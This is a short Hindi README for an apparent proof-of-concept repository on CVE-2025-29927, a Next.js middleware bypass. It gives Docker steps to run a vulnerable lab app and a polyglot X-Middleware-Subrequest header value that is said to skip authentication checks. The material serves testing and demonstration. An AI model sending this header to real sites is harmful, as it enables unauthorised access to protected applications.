
CVE-2025-29927 के लिए PoC: Next.js Middleware Bypass Vulnerability. प्रदर्शित करता है कि x-middleware-subrequest प्रमाणीकरण जांच को बाइपास कर सकता है। परीक्षण के लिए Docker सेटअप शामिल है।
यह रिपॉजिटरी Next.js में CVE-2025-29927 भेद्यता को प्रदर्शित करता है, जहां आंतरिक हेडर x-middleware-subrequest का उपयोग मिडलवेयर जांचों (जैसे प्रमाणीकरण) को बाइपास करने के लिए किया जा सकता है।
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env फ़ाइल में सीक्रेट अपडेट करें:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
हम एक पॉलीग्लॉट का उपयोग करके इस मुद्दे के शोषण को बहुत सरल बना सकते हैं जो हमें विभिन्न संभावित मामलों को प्रभावी ढंग से कवर करने देता है। हम निम्नलिखित HTTP हेडर के साथ इसे प्राप्त करने में सक्षम थे, जिसका उपयोग प्रमाणीकरण बाइपास की उपस्थिति की जाँच करने के लिए किया जाता है:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

